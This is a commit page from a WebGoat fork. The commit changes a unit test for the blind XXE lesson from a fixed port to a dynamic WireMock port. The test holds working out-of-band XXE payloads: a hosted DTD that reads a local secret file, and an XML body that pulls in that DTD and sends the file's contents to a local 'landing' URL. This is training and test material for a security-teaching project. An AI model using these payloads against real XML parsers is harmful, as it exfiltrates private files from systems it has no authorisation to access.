dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions 4 Packages Projects Releases Wiki Activity

changed unit test to dynamic port to prevent port conflict and build failure

Browse Source
This commit is contained in:
Rene Zubcevic 2019-03-06 22:18:01 +01:00 committed by Nanne Baars
parent 1c2648e0a9
commit 4050e899ff
1 changed files with 9 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
View File

@ -18,6 +18,7 @@ import org.springframework.test.web.servlet.setup.MockMvcBuilders;
import java.io.File;
import java.util.List;
import static com.github.tomakehurst.wiremock.core.WireMockConfiguration.wireMockConfig;
import static com.github.tomakehurst.wiremock.client.WireMock.*;
import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.when;
@ -35,9 +36,11 @@ public class BlindSendFileAssignmentTest extends LessonTest {
private Comments comments;
@Value("${webgoat.user.directory}")
private String webGoatHomeDirectory;
private int port;
@Rule
public WireMockRule webwolfServer = new WireMockRule(9090);
public WireMockRule webwolfServer = new WireMockRule(wireMockConfig().dynamicPort());
@Before
public void setup() throws Exception {
@ -45,6 +48,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
when(webSession.getCurrentLesson()).thenReturn(xxe);
this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
when(webSession.getUserName()).thenReturn("unit-test");
port = webwolfServer.port();
}
@Test
@ -74,7 +78,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
//Host DTD on WebWolf site
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>\">\n" +
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n" +
"%all;";
webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
.willReturn(aResponse()
@ -85,7 +89,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
//Make the request from WebGoat
String xml = "<?xml version=\"1.0\"?>" +
"<!DOCTYPE comment [" +
"<!ENTITY % remote SYSTEM \"http://localhost:9090/files/test.dtd\">" +
"<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
"%remote;" +
"]>" +
"<comment><text>test&send;</text></comment>";
@ -97,7 +101,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
File targetFile = new File(webGoatHomeDirectory, "/XXE/secret.txt");
//Host DTD on WebWolf site
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>\">\n";
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:"+port+"/landing?text=%file;'>\">\n";
webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
.willReturn(aResponse()
.withStatus(200)
@ -108,7 +112,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
String xml = "<?xml version=\"1.0\"?>" +
"<!DOCTYPE comment [" +
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
"<!ENTITY % remote SYSTEM \"http://localhost:9090/files/test.dtd\">" +
"<!ENTITY % remote SYSTEM \"http://localhost:"+port+"/files/test.dtd\">" +
"%remote;" +
"%all;" +
"]>" +